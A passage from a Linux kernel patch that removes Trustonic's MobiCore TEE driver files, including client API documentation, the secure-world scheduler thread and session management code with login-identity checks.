-- * Return codes:
-- *	MC_DRV_OK:			operation completed successfully
-- *	MC_DRV_ERR_INVALID_OPERATION:	device already opened
-- *	MC_DRV_ERR_DAEMON_UNREACHABLE:	problems with daemon
-- *	MC_DRV_ERR_UNKNOWN_DEVICE:	device_id unknown
-- *	MC_DRV_ERR_INVALID_DEVICE_FILE:	kernel module under /dev/mobicore
-- *					cannot be opened
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_open_device(uint32_t device_id);
--
--/**
-- * mc_close_device() - Close the connection to a MobiCore device.
-- * @device_id:		Identifier for the MobiCore device.
-- *
-- * When closing a device, active sessions have to be closed beforehand.
-- * Resources associated with the device will be released.
-- * The device may be opened again after it has been closed.
-- *
-- * MC_DEVICE_ID_DEFAULT refers to the default device.
-- *
-- * Return codes:
-- *	MC_DRV_OK:			operation completed successfully
-- *	MC_DRV_ERR_UNKNOWN_DEVICE:	device id is invalid
-- *	MC_DRV_ERR_SESSION_PENDING:	a session is still open
-- *	MC_DRV_ERR_DAEMON_UNREACHABLE:	problems with daemon occur
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_close_device(uint32_t device_id);
--
--/**
-- * mc_open_session() - Open a new session to a Trustlet.
-- * @session:		On success, the session data will be returned
-- * @uuid:		UUID of the Trustlet to be opened
-- * @tci:		TCI buffer for communicating with the Trustlet
-- * @tci_len:		Length of the TCI buffer. Maximum allowed value
-- *			is MC_MAX_TCI_LEN
-- *
-- * The Trustlet with the given UUID has to be available in the flash filesystem.
-- *
-- * Write MCP open message to buffer and notify MobiCore about the availability
-- * of a new command.
-- *
-- * Waits till the MobiCore responses with the new session ID (stored in the MCP
-- * buffer).
-- *
-- * Note that session.device_id has to be the device id of an opened device.
-- *
-- * Return codes:
-- *	MC_DRV_OK:			operation completed successfully
-- *	MC_DRV_INVALID_PARAMETER:	session parameter is invalid
-- *	MC_DRV_ERR_UNKNOWN_DEVICE:	device id is invalid
-- *	MC_DRV_ERR_DAEMON_UNREACHABLE:	problems with daemon socket occur
-- *	MC_DRV_ERR_NQ_FAILED:		daemon returns an error
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_open_session(
--	struct mc_session_handle *session, const struct mc_uuid_t *uuid,
--	uint8_t *tci, uint32_t tci_len);
--
--/**
-- * mc_open_trustlet() - Open a new session to the provided Trustlet.
-- * @session:		On success, the session data will be returned
-- * @spid:		Service Provider ID (for SP trustlets otherwise ignored)
-- * @trustlet		Memory buffer containing the Trusted Application binary
-- * @trustlet_len	Trusted Application length
-- * @tci:		TCI buffer for communicating with the Trustlet
-- * @tci_len:		Length of the TCI buffer. Maximum allowed value
-- *			is MC_MAX_TCI_LEN
-- *
-- * Write MCP open message to buffer and notify MobiCore about the availability
-- * of a new command.
-- *
-- * Waits till the MobiCore responses with the new session ID (stored in the MCP
-- * buffer).
-- *
-- * Note that session.device_id has to be the device id of an opened device.
-- *
-- * Return codes:
-- *	MC_DRV_OK:			operation completed successfully
-- *	MC_DRV_INVALID_PARAMETER:	session parameter is invalid
-- *	MC_DRV_ERR_UNKNOWN_DEVICE:	device id is invalid
-- *	MC_DRV_ERR_DAEMON_UNREACHABLE:	problems with daemon socket occur
-- *	MC_DRV_ERR_NQ_FAILED:		daemon returns an error
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_open_trustlet(
--	struct mc_session_handle *session, uint32_t spid,
--	uint8_t *trustlet, uint32_t trustlet_len, uint8_t *tci, uint32_t len);
--
--/**
-- * mc_close_session() - Close a Trustlet session.
-- * @session:		Session to be closed.
-- *
-- * Closes the specified MobiCore session. The call will block until the
-- * session has been closed.
-- *
-- * Device device_id has to be opened in advance.
-- *
-- * Return codes:
-- *	MC_DRV_OK:			operation completed successfully
-- *	MC_DRV_INVALID_PARAMETER:	session parameter is invalid
-- *	MC_DRV_ERR_UNKNOWN_SESSION:	session id is invalid
-- *	MC_DRV_ERR_UNKNOWN_DEVICE:	device id of session is invalid
-- *	MC_DRV_ERR_DAEMON_UNREACHABLE:	problems with daemon occur
-- *	MC_DRV_ERR_INVALID_DEVICE_FILE:	daemon cannot open Trustlet file
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_close_session(
--	struct mc_session_handle *session);
--
--/**
-- * mc_notify() - Notify a session.
-- * @session:		The session to be notified.
-- *
-- * Notifies the session end point about available message data.
-- * If the session parameter is correct, notify will always succeed.
-- * Corresponding errors can only be received by mc_wait_notification().
-- *
-- * A session has to be opened in advance.
-- *
-- * Return codes:
-- *	MC_DRV_OK:			operation completed successfully
-- *	MC_DRV_INVALID_PARAMETER:	session parameter is invalid
-- *	MC_DRV_ERR_UNKNOWN_SESSION:	session id is invalid
-- *	MC_DRV_ERR_UNKNOWN_DEVICE:	device id of session is invalid
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_notify(struct mc_session_handle *session);
--
--/**
-- * mc_wait_notification() - Wait for a notification.
-- * @session:		The session the notification should correspond to.
-- * @timeout:		Time in milliseconds to wait
-- *			(MC_NO_TIMEOUT : direct return, > 0 : milliseconds,
-- *			 MC_INFINITE_TIMEOUT : wait infinitely)
-- *
-- * Wait for a notification issued by the MobiCore for a specific session.
-- * The timeout parameter specifies the number of milliseconds the call will wait
-- * for a notification.
-- *
-- * If the caller passes 0 as timeout value the call will immediately return.
-- * If timeout value is below 0 the call will block until a notification for the
-- * session has been received.
-- *
-- * If timeout is below 0, call will block.
-- *
-- * Caller has to trust the other side to send a notification to wake him up
-- * again.
-- *
-- * Return codes:
-- *	MC_DRV_OK:			operation completed successfully
-- *	MC_DRV_ERR_TIMEOUT:		no notification arrived in time
-- *	MC_DRV_INFO_NOTIFICATION:	a problem with the session was
-- *					encountered. Get more details with
-- *					mc_get_session_error_code()
-- *	MC_DRV_ERR_NOTIFICATION:	a problem with the socket occurred
-- *	MC_DRV_INVALID_PARAMETER:	a parameter is invalid
-- *	MC_DRV_ERR_UNKNOWN_SESSION:	session id is invalid
-- *	MC_DRV_ERR_UNKNOWN_DEVICE:	device id of session is invalid
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_wait_notification(
--	struct mc_session_handle *session, int32_t timeout);
--
--/**
-- * mc_malloc_wsm() - Allocate a block of world shared memory (WSM).
-- * @device_id:		The ID of an opened device to retrieve the WSM from.
-- * @align:		The alignment (number of pages) of the memory block
-- *			(e.g. 0x00000001 for 4kb).
-- * @len:		Length of the block in bytes.
-- * @wsm:		Virtual address of the world shared memory block.
-- * @wsm_flags:		Platform specific flags describing the memory to
-- *			be allocated.
-- *
-- * The MC driver allocates a contiguous block of memory which can be used as
-- * WSM.
-- * This implicates that the allocated memory is aligned according to the
-- * alignment parameter.
-- *
-- * Always returns a buffer of size WSM_SIZE aligned to 4K.
-- *
-- * Align and wsm_flags are currently ignored
-- *
-- * Return codes:
-- *	MC_DRV_OK:			operation completed successfully
-- *	MC_DRV_INVALID_PARAMETER:	a parameter is invalid
-- *	MC_DRV_ERR_UNKNOWN_DEVICE:	device id is invalid
-- *	MC_DRV_ERR_NO_FREE_MEMORY:	no more contiguous memory is
-- *					available in this size or for this
-- *					process
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_malloc_wsm(
--	uint32_t  device_id,
--	uint32_t  align,
--	uint32_t  len,
--	uint8_t   **wsm,
--	uint32_t  wsm_flags
--);
--
--/**
-- * mc_free_wsm() - Free a block of world shared memory (WSM).
-- * @device_id:		The ID to which the given address belongs
-- * @wsm:		Address of WSM block to be freed
-- *
-- * The MC driver will free a block of world shared memory (WSM) previously
-- * allocated with mc_malloc_wsm(). The caller has to assure that the address
-- * handed over to the driver is a valid WSM address.
-- *
-- * Return codes:
-- *	MC_DRV_OK:			operation completed successfully
-- *	MC_DRV_INVALID_PARAMETER:	a parameter is invalid
-- *	MC_DRV_ERR_UNKNOWN_DEVICE:	when device id is invalid
-- *	MC_DRV_ERR_FREE_MEMORY_FAILED:	on failure
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_free_wsm(uint32_t device_id,
--					       uint8_t *wsm);
--
--/**
-- *mc_map() -	Map additional bulk buffer between a Trustlet Connector (TLC)
-- *		and the Trustlet (TL) for a session
-- * @session:		Session handle with information of the device_id and
-- *			the session_id. The given buffer is mapped to the
-- *			session specified in the sessionHandle
-- * @buf:		Virtual address of a memory portion (relative to TLC)
-- *			to be shared with the Trustlet, already includes a
-- *			possible offset!
-- * @len:		length of buffer block in bytes.
-- * @map_info:		Information structure about the mapped Bulk buffer
-- *			between the TLC (NWd) and the TL (SWd).
-- *
-- * Memory allocated in user space of the TLC can be mapped as additional
-- * communication channel (besides TCI) to the Trustlet. Limitation of the
-- * Trustlet memory structure apply: only 6 chunks can be mapped with a maximum
-- * chunk size of 1 MiB each.
-- *
-- * It is up to the application layer (TLC) to inform the Trustlet
-- * about the additional mapped bulk memory.
-- *
-- * Return codes:
-- *	MC_DRV_OK:			operation completed successfully
-- *	MC_DRV_INVALID_PARAMETER:	a parameter is invalid
-- *	MC_DRV_ERR_UNKNOWN_SESSION:	session id is invalid
-- *	MC_DRV_ERR_UNKNOWN_DEVICE:	device id of session is invalid
-- *	MC_DRV_ERR_DAEMON_UNREACHABLE:	problems with daemon occur
-- *	MC_DRV_ERR_BULK_MAPPING:	buf is already uses as bulk buffer or
-- *					when registering the buffer failed
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_map(
--	struct mc_session_handle *session, void	*buf, uint32_t len,
--	struct mc_bulk_map *map_info);
--
--/**
-- * mc_unmap() -	Remove additional mapped bulk buffer between Trustlet Connector
-- *		(TLC) and the Trustlet (TL) for a session
-- * @session:		Session handle with information of the device_id and
-- *			the session_id. The given buffer is unmapped from the
-- *			session specified in the sessionHandle.
-- * @buf:		Virtual address of a memory portion (relative to TLC)
-- *			shared with the TL, already includes a possible offset!
-- * @map_info:		Information structure about the mapped Bulk buffer
-- *			between the TLC (NWd) and the TL (SWd)
-- *
-- * The bulk buffer will immediately be unmapped from the session context.
-- *
-- * The application layer (TLC) must inform the TL about unmapping of the
-- * additional bulk memory before calling mc_unmap!
-- *
-- * The clientlib currently ignores the len field in map_info.
-- *
-- * Return codes:
-- *	MC_DRV_OK:			operation completed successfully
-- *	MC_DRV_INVALID_PARAMETER:	a parameter is invalid
-- *	MC_DRV_ERR_UNKNOWN_SESSION:	session id is invalid
-- *	MC_DRV_ERR_UNKNOWN_DEVICE:	device id of session is invalid
-- *	MC_DRV_ERR_DAEMON_UNREACHABLE:	problems with daemon occur
-- *	MC_DRV_ERR_BULK_UNMAPPING:	buf was not registered earlier
-- *					or when unregistering failed
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_unmap(
--	struct mc_session_handle *session, void *buf,
--	struct mc_bulk_map *map_info);
--
--/*
-- * mc_get_session_error_code() - Get additional error information of the last
-- *				 error that occurred on a session.
-- * @session:		Session handle with information of the device_id and
-- *			the session_id
-- * @exit_code:		>0 Trustlet has terminated itself with this value,
-- *			<0 Trustlet is dead because of an error within the
-- *			MobiCore (e.g. Kernel exception). See also MCI
-- *			definition.
-- *
-- * After the request the stored error code will be deleted.
-- *
-- * Return codes:
-- *	MC_DRV_OK:			operation completed successfully
-- *	MC_DRV_INVALID_PARAMETER:	a parameter is invalid
-- *	MC_DRV_ERR_UNKNOWN_SESSION:	session id is invalid
-- *	MC_DRV_ERR_UNKNOWN_DEVICE:	device id of session is invalid
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_get_session_error_code(
--	struct mc_session_handle *session, int32_t *exit_code);
--
--#endif /* _MOBICORE_DRIVER_API_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/scheduler.c b/drivers/gud/MobiCoreDriver/scheduler.c
-deleted file mode 100644
-index 444f839d8ad1d..0000000000000
---- a/drivers/gud/MobiCoreDriver/scheduler.c
-+++ /dev/null
-@@ -1,231 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include <linux/slab.h>
--#include <linux/mutex.h>
--#include <linux/device.h>
--#include <linux/kthread.h>
--#include <linux/completion.h>
--#include <linux/stringify.h>
--#include <linux/version.h>
--
--#include "public/mc_linux.h"
--
--#include "main.h"
--#include "fastcall.h"
--#include "debug.h"
--#include "logging.h"
--#include "mcp.h"
--#include "scheduler.h"
--
--#define SCHEDULING_FREQ		5   /**< N-SIQ every n-th time */
--
--static struct sched_ctx {
--	struct task_struct	*thread;
--	bool			thread_run;
--	struct completion	idle_complete;	/* Unblock scheduler thread */
--	struct completion	sleep_complete;	/* Wait for sleep status */
--	struct mutex		sleep_mutex;	/* Protect sleep request */
--	struct mutex		request_mutex;	/* Protect all below */
--	/* The order of this enum matters */
--	enum {
--		NONE,		/* No specific request */
--		YIELD,		/* Run the SWd */
--		NSIQ,		/* Schedule the SWd */
--		SUSPEND,	/* Suspend the SWd */
--		RESUME,		/* Resume the SWd */
--	}			request;
--	bool			suspended;
--} sched_ctx;
--
--static int mc_scheduler_command(int command)
--{
--	if (IS_ERR_OR_NULL(sched_ctx.thread))
--		return -EFAULT;
--
--	mutex_lock(&sched_ctx.request_mutex);
--	if (sched_ctx.request < command) {
--		sched_ctx.request = command;
--		complete(&sched_ctx.idle_complete);
--	}
--
--	mutex_unlock(&sched_ctx.request_mutex);
--	return 0;
--}
--
--static int mc_scheduler_pm_command(int command)
--{
--	int ret = -EPERM;
--
--	if (IS_ERR_OR_NULL(sched_ctx.thread))
--		return -EFAULT;
--
--	mutex_lock(&sched_ctx.sleep_mutex);
--
--	/* Send request */
--	mc_scheduler_command(command);
--
--	/* Wait for scheduler to reply */
--	wait_for_completion(&sched_ctx.sleep_complete);
--	mutex_lock(&sched_ctx.request_mutex);
--	if (command == SUSPEND) {
--		if (sched_ctx.suspended)
--			ret = 0;
--	} else {
--		if (!sched_ctx.suspended)
--			ret = 0;
--	}
--
--	mutex_unlock(&sched_ctx.request_mutex);
--
--	mutex_unlock(&sched_ctx.sleep_mutex);
--	return ret;
--}
--
--static int mc_dev_command(enum mcp_scheduler_commands command)
--{
--	switch (command) {
--	case MCP_YIELD:
--		return mc_scheduler_command(YIELD);
--	case MCP_NSIQ:
--		return mc_scheduler_command(NSIQ);
--	}
--
--	return -EINVAL;
--}
--
--int mc_scheduler_suspend(void)
--{
--	return mc_scheduler_pm_command(SUSPEND);
--}
--
--int mc_scheduler_resume(void)
--{
--	return mc_scheduler_pm_command(RESUME);
--}
--
--/*
-- * This thread, and only this thread, schedules the SWd. Hence, reading the idle
-- * status and its associated timeout is safe from race conditions.
-- */
--static int tee_scheduler(void *arg)
--{
--	int timeslice = 0;	/* Actually scheduling period */
--	int ret = 0;
--
--	MCDRV_DBG("enter");
--	while (1) {
--		int32_t timeout_ms = -1;
--		bool pm_request = false;
--
--		if (sched_ctx.suspended || mcp_get_idle_timeout(&timeout_ms)) {
--			/* If timeout is 0 we keep scheduling the SWd */
--			if (!timeout_ms)
--				mc_scheduler_command(NSIQ);
--			else if (timeout_ms < 0)
--				wait_for_completion(&sched_ctx.idle_complete);
--			else if (!wait_for_completion_timeout(
--					&sched_ctx.idle_complete,
--					msecs_to_jiffies(timeout_ms)))
--				/* Timed out, force SWd schedule */
--				mc_scheduler_command(NSIQ);
--		}
--
--		if (kthread_should_stop() || !sched_ctx.thread_run)
--			break;
--
--		/* Get requested command if any */
--		mutex_lock(&sched_ctx.request_mutex);
--		if (sched_ctx.request == YIELD)
--			/* Yield forced: increment timeslice */
--			timeslice++;
--		else if (sched_ctx.request >= NSIQ) {
--			/* Force N_SIQ, also to suspend/resume SWd */
--			timeslice = 0;
--			if (sched_ctx.request == SUSPEND) {
--				mcp_suspend();
--				pm_request = true;
--			} else if (sched_ctx.request == RESUME) {
--				mcp_resume();
--				pm_request = true;
--			}
--		}
--
--		sched_ctx.request = NONE;
--		mutex_unlock(&sched_ctx.request_mutex);
--
--		/* Reset timeout so we don't loop if SWd halted */
--		mcp_reset_idle_timeout();
--		if (timeslice--) {
--			/* Resume SWd from where it was */
--			ret = mc_fc_yield();
--		} else {
--			timeslice = SCHEDULING_FREQ;
--			/* Call SWd scheduler */
--			ret = mc_fc_nsiq();
--		}
--
--		/* Always flush log buffer after the SWd has run */
--		mc_logging_run();
--		if (ret)
--			break;
--
--		/* Should have suspended by now if requested */
--		mutex_lock(&sched_ctx.request_mutex);
--		if (pm_request) {
--			sched_ctx.suspended = mcp_suspended();
--			complete(&sched_ctx.sleep_complete);
--		}
--
--		mutex_unlock(&sched_ctx.request_mutex);
--
--		/* Flush pending notifications if possible */
--		if (mcp_notifications_flush())
--			complete(&sched_ctx.idle_complete);
--	}
--
--	MCDRV_DBG("exit, ret is %d", ret);
--	return ret;
--}
--
--int mc_scheduler_start(void)
--{
--	sched_ctx.thread_run = true;
--	sched_ctx.thread = kthread_run(tee_scheduler, NULL, "tee_scheduler");
--	if (IS_ERR(sched_ctx.thread)) {
--		MCDRV_ERROR("tee_scheduler thread creation failed");
--		return PTR_ERR(sched_ctx.thread);
--	}
--
--	mcp_register_scheduler(mc_dev_command);
--	complete(&sched_ctx.idle_complete);
--	return 0;
--}
--
--void mc_scheduler_stop(void)
--{
--	mcp_register_scheduler(NULL);
--	sched_ctx.thread_run = false;
--	complete(&sched_ctx.idle_complete);
--	kthread_stop(sched_ctx.thread);
--}
--
--int mc_scheduler_init(void)
--{
--	init_completion(&sched_ctx.idle_complete);
--	init_completion(&sched_ctx.sleep_complete);
--	mutex_init(&sched_ctx.sleep_mutex);
--	mutex_init(&sched_ctx.request_mutex);
--	return 0;
--}
-diff --git a/drivers/gud/MobiCoreDriver/scheduler.h b/drivers/gud/MobiCoreDriver/scheduler.h
-deleted file mode 100644
-index c3c17f1c9017c..0000000000000
---- a/drivers/gud/MobiCoreDriver/scheduler.h
-+++ /dev/null
-@@ -1,25 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef __MC_SCHEDULER_H__
--#define __MC_SCHEDULER_H__
--
--int mc_scheduler_init(void);
--static inline void mc_scheduler_exit(void) {}
--int mc_scheduler_start(void);
--void mc_scheduler_stop(void);
--int mc_scheduler_suspend(void);
--int mc_scheduler_resume(void);
--
--#endif /* __MC_SCHEDULER_H__ */
-diff --git a/drivers/gud/MobiCoreDriver/session.c b/drivers/gud/MobiCoreDriver/session.c
-deleted file mode 100644
-index 1dbb8900b2b3a..0000000000000
---- a/drivers/gud/MobiCoreDriver/session.c
-+++ /dev/null
-@@ -1,779 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#include <linux/types.h>
--#include <linux/slab.h>
--#include <linux/device.h>
--#include <linux/jiffies.h>
--#include <linux/sched.h>
--#include <linux/workqueue.h>
--#include <linux/err.h>
--#include <linux/mm.h>
--#include <crypto/hash.h>
--#include <linux/scatterlist.h>
--#include <linux/fs.h>
--
--#include "public/mc_linux.h"
--#include "public/mc_admin.h"
--
--#include "platform.h"		/* MC_UIDGID_OLDSTYLE */
--#include "main.h"
--#include "debug.h"
--#include "mmu.h"
--#include "mcp.h"
--#include "client.h"		/* *cbuf* */
--#include "session.h"
--#include "mci/mcimcp.h"
--
--#define SHA1_HASH_SIZE       20
--
--struct tbase_wsm {
--	/* Buffer NWd addr (uva or kva, used only for lookup) */
--	uintptr_t		va;
--	/* buffer length */
--	uint32_t		len;
--	/* Buffer SWd addr */
--	uint32_t		sva;
--	/* mmu L2 table */
--	struct tbase_mmu	*mmu;
--	/* possibly a pointer to a cbuf */
--	struct tbase_cbuf	*cbuf;
--	/* list node */
--	struct list_head	list;
--};
--
--/*
-- * Postponed closing for GP TAs.
-- * Implemented as a worker because cannot be executed from within isr_worker.
-- */
--static void session_close_worker(struct work_struct *work)
--{
--	struct mcp_session *mcp_session;
--	struct tbase_session *session;
--
--	mcp_session = container_of(work, struct mcp_session, close_work);
--	session = container_of(mcp_session, struct tbase_session, mcp_session);
--	session_close(session);
--}
--
--/* Forward declarations */
--static struct tbase_wsm *wsm_create(struct tbase_session *session,
--				    uintptr_t buf, uint32_t len);
--static void wsm_free(struct tbase_wsm *wsm);
--
--static int hash_path_and_data(char *hash, const void *data,
--			      unsigned int data_len)
--{
--	struct mm_struct *mm = current->mm;
--	struct hash_desc desc;
--	struct scatterlist sg;
--	char *buf;
--	char *path;
--	unsigned int path_len;
--	int ret = 0;
--
--	buf = (char *)__get_free_page(GFP_KERNEL);
--	if (!buf)
--		return -ENOMEM;
--
--	down_read(&mm->mmap_sem);
--	if (!mm->exe_file) {
--		ret = -ENOENT;
--		goto end;
--	}
--
--	path = d_path(&mm->exe_file->f_path, buf, PAGE_SIZE);
--	if (IS_ERR(path)) {
--		ret = PTR_ERR(path);
--		goto end;
--	}
--
--	MCDRV_DBG("current process path = ");
--	{
--		char *c;
--
--		for (c = path; *c; c++)
--			MCDRV_DBG("%c %d", *c, *c);
--	}
--
--	path_len = strnlen(path, PAGE_SIZE);
--	MCDRV_DBG("path_len = %u", path_len);
--	desc.tfm = crypto_alloc_hash("sha1", 0, CRYPTO_ALG_ASYNC);
--	if (IS_ERR(desc.tfm)) {
--		ret = PTR_ERR(desc.tfm);
--		MCDRV_DBG("could not alloc hash = %d", ret);
--		goto end;
--	}
--
--	desc.flags = 0;
--	sg_init_one(&sg, path, path_len);
--	crypto_hash_init(&desc);
--	crypto_hash_update(&desc, &sg, path_len);
--	if (data) {
--		MCDRV_DBG("current process path: hashing additional data\n");
--		sg_init_one(&sg, data, data_len);
--		crypto_hash_update(&desc, &sg, data_len);
--	}
--
--	crypto_hash_final(&desc, hash);
--	crypto_free_hash(desc.tfm);
--
--end:
--	up_read(&mm->mmap_sem);
--	free_page((unsigned long)buf);
--
--	return ret;
--}
--
--static int check_prepare_identity(const struct mc_identity *identity,
--				  struct identity *mcp_identity)
--{
--	struct mc_identity *mcp_id = (struct mc_identity *)mcp_identity;
--	uint8_t hash[SHA1_HASH_SIZE];
--	bool application = false;
--	const void *data;
--	unsigned int data_len;
--
--	/* Mobicore doesn't support GP client authentication. */
--	if (!g_ctx.f_client_login &&
--	    (identity->login_type != TEEC_LOGIN_PUBLIC)) {
--		MCDRV_DBG_WARN("Unsupported login type %d",
--			       identity->login_type);
--		return -EINVAL;
--	}
--
--	/* Copy login type */
--	mcp_identity->login_type = identity->login_type;
--
--	/* Fill in uid field */
--	if ((identity->login_type == TEEC_LOGIN_USER) ||
--	    (identity->login_type == TEEC_LOGIN_USER_APPLICATION)) {
--		/* Set euid and ruid of the process. */
--#if !defined(KUIDT_INIT) || defined(MC_UIDGID_OLDSTYLE)
--		mcp_id->uid.euid = current_euid();
--		mcp_id->uid.ruid = current_uid();
--#else
--		mcp_id->uid.euid = current_euid().val;
--		mcp_id->uid.ruid = current_uid().val;
--#endif
--	}
--
--	/* Check gid field */
--	if ((identity->login_type == TEEC_LOGIN_GROUP) ||
--	    (identity->login_type == TEEC_LOGIN_GROUP_APPLICATION)) {
--#if !defined(KUIDT_INIT) || defined(MC_UIDGID_OLDSTYLE)
--		gid_t gid = identity->gid;
--#else
--		kgid_t gid = {
--			.val = identity->gid,
--		};
--#endif
--		/* Check if gid is one of: egid of the process, its rgid or one
--		 * of its supplementary groups */
--		if (!in_egroup_p(gid) && !in_group_p(gid)) {
--			MCDRV_DBG("group %d not allowed", identity->gid);
--			return -EACCES;
--		}
--
--		MCDRV_DBG("group %d found", identity->gid);
--		mcp_id->gid = identity->gid;
--	}
--
--	switch (identity->login_type) {
--	case TEEC_LOGIN_PUBLIC:
--	case TEEC_LOGIN_USER:
--	case TEEC_LOGIN_GROUP:
--		break;
--	case TEEC_LOGIN_APPLICATION:
--		application = true;
--		data = NULL;
--		data_len = 0;
--		break;
--	case TEEC_LOGIN_USER_APPLICATION:
--		application = true;
--		data = &mcp_id->uid;
--		data_len = sizeof(mcp_id->uid);
--		break;
--	case TEEC_LOGIN_GROUP_APPLICATION:
--		application = true;
--		data = &identity->gid;
--		data_len = sizeof(identity->gid);
--		break;
--	default:
--		/* Any other login_type value is invalid. */
--		MCDRV_DBG_WARN("Invalid login type");
--		return -EINVAL;
--	}
--
--	if (application) {
--		if (hash_path_and_data(hash, data, data_len)) {
--			MCDRV_DBG("error in hash calculation");
--			return -EAGAIN;
--		}
--
--		memcpy(&mcp_id->login_data, hash, sizeof(mcp_id->login_data));
--	}
--
--	return 0;
--}
--
--/*
-- * Create a session object.
-- * Note: object is not attached to client yet.
-- */
--struct tbase_session *session_create(struct tbase_client *client, bool is_gp,
--				     struct mc_identity *identity)
--{
--	struct tbase_session *session;
--	struct identity mcp_identity;
--
--	if (is_gp) {
--		/* Check identity method and data. */
--		int ret = check_prepare_identity(identity, &mcp_identity);
--
--		if (ret)
--			return ERR_PTR(ret);
--	}
--
--	/* Allocate session object */
--	session = kzalloc(sizeof(*session), GFP_KERNEL);
--	if (!session)
--		return ERR_PTR(-ENOMEM);
--
--	mutex_init(&session->close_lock);
--	/* Initialise object members */
--	mcp_session_init(&session->mcp_session, is_gp, &mcp_identity);
--	INIT_WORK(&session->mcp_session.close_work, session_close_worker);
--	session->client = client;
--	kref_init(&session->kref);
--	INIT_LIST_HEAD(&session->list);
--	mutex_init(&session->wsms_lock);
--	INIT_LIST_HEAD(&session->wsms);
--	MCDRV_DBG("created session %p: client %p", session, session->client);
--	return session;
--}
--
--int session_open(struct tbase_session *session, const struct tbase_object *obj,
--		 const struct tbase_mmu *obj_mmu, uintptr_t tci, size_t len)
--{
--	struct mcp_buffer_map map;
--
--	tbase_mmu_buffer(obj_mmu, &map);
--	/* Create wsm object for tci */
--	if (tci && len) {
--		struct tbase_wsm *wsm;
--		struct mcp_buffer_map tci_map;
--		int ret = 0;
--
--		mutex_lock(&session->wsms_lock);
--		wsm = wsm_create(session, tci, len);
--		if (IS_ERR(wsm))
--			ret = PTR_ERR(wsm);
--
--		mutex_unlock(&session->wsms_lock);
--		if (ret)
--			return ret;
--
--		tbase_mmu_buffer(wsm->mmu, &tci_map);
--		ret = mcp_open_session(&session->mcp_session, obj, &map,
--				       &tci_map);
--		if (ret) {
--			mutex_lock(&session->wsms_lock);
--			wsm_free(wsm);
--			mutex_unlock(&session->wsms_lock);
--		}
--
--		return ret;
--	}
--
--	if (tci || len) {
--		MCDRV_ERROR("Tci pointer and length are incoherent");
--		return -EINVAL;
--	}
--
--	return mcp_open_session(&session->mcp_session, obj, &map, NULL);
--}
--
--/*
-- * Close TA and unreference session object.
-- * Object will be freed if reference reaches 0.
-- * Session object is assumed to have been removed from main list, which means
-- * that session_close cannot be called anymore.
-- */
--int session_close(struct tbase_session *session)
--{
--	int ret = 0;
--
--	if (!session)
--		return -ENXIO;
--
--	mutex_lock(&session->close_lock);
--	switch (mcp_close_session(&session->mcp_session)) {
--	case 0:
--		/* TA is closed, remove from closing list */
--		mutex_lock(&g_ctx.closing_lock);
--		list_del(&session->list);
--		mutex_unlock(&g_ctx.closing_lock);
--		/* Remove the ref we took on creation, exit if session freed */
--		if (session_put(session))
--			return 0;
--
--		break;
--	case -EBUSY:
--		/*
--		 * (GP) TA needs time to close. The "TA closed" notification
--		 * will trigger a new call to session_close().
--		 * Return OK but do not unref.
--		 */
--		break;
--	default:
--		MCDRV_ERROR("Failed to close session %x in SWd",
--			    session->mcp_session.id);
--		ret = -EPERM;
--	}
--
--	mutex_unlock(&session->close_lock);
--	return ret;
--}
--
--/*
-- * Free session object and all objects it contains (wsm).
-- */
--static void session_free(struct kref *kref)
--{
--	struct tbase_session *session;
--	struct tbase_wsm *wsm, *next;
--
--	/* Remove remaining shared buffers (unmapped in SWd by mcp_close) */
--	session = container_of(kref, struct tbase_session, kref);
--	list_for_each_entry_safe(wsm, next, &session->wsms, list) {
--		MCDRV_DBG("session %p: free wsm %p", session, wsm);
--		wsm_free(wsm);
--	}
--
--	MCDRV_DBG("freed session %p: client %p id %x",
--		  session, session->client, session->mcp_session.id);
--	kfree(session);
--}
--
--/*
-- * Unreference session.
-- * Free session object if reference reaches 0.
-- */
--int session_put(struct tbase_session *session)
--{
--	return kref_put(&session->kref, session_free);
--}
--
--/*
-- * Send a notification to TA
-- */
--int session_notify_swd(struct tbase_session *session)
--{
--	if (!session) {
--		MCDRV_ERROR("Session pointer is null");
--		return -EINVAL;
--	}
--
--	return mcp_notify(&session->mcp_session);
--}
--
--/*
-- * Read and clear last notification received from TA
-- */
--int32_t session_exitcode(struct tbase_session *session)
--{
--	return mcp_session_exitcode(&session->mcp_session);
--}
--
--/*
-- * Free a WSM object
-- */
--static void wsm_free(struct tbase_wsm *wsm)
--{
--	/* Remove wsm from its parent session's list */
--	list_del(&wsm->list);
--	/* Free MMU table */
